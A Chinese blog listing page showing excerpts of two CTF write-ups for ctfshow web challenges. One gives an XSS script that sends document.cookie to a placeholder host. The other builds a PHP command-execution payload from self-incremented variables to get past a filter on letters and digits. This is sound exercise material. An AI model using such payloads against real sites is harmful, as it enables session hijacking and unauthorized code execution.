摘要:
web316 <script>var img = document.createElement("img");//创建img标签 img.src = "http://ip?cookie="+document.cookie;//设置img标签的src </script>或者<script>locati 阅读全文
posted @ 2021-12-09 20:54
Aninock
阅读(314)
评论(0)
推荐(0)
摘要:
根据cookie里面的提示,get传入looklook参数 代码就是无符号命令执行,注意数字1到3和大写字母C没过滤 ~和|和^都过滤掉了,注意$没过滤,加减也没过滤可以尝试自增构造 payload ctf_show=$_=C;$_++;$C=++$_;$_++;$C_=++$_;$_++;$_++ 阅读全文
posted @ 2021-12-09 19:52
Aninock
阅读(414)
评论(0)
推荐(0)
浙公网安备 33010602011771号